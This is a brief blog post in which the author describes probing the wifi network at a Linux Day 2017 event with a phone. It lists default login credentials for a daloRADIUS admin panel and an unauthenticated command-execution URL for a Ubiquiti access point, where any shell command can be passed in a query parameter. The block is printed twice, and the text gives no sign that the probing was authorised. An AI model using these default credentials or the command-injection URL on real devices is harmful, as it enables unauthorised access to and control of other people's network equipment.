During the linux day 2017 at guardia sanframondi I played with my phone on the local network ... with the browser (and google to get informations on vulnerabilities).
-Linuxday wifi-
daloRADIUS default password
user:administrator
password:radius
admin/admin
ip:192.168.1.249
http://192.168.1.249
Ubiquity device (wifi antenna/ap)
ip:192.168.1.20
Unauthenticated command execution
https://192.168.1.20/pingtest_action.cgi?command=[anyshellcommand]
-Linuxday wifi-
daloRADIUS default password
user:administrator
password:radius
admin/admin
ip:192.168.1.249
http://192.168.1.249
Ubiquity device (wifi antenna/ap)
ip:192.168.1.20
Unauthenticated command execution
https://192.168.1.20/pingtest_action.cgi?command=[anyshellcommand]
Comments
Post a Comment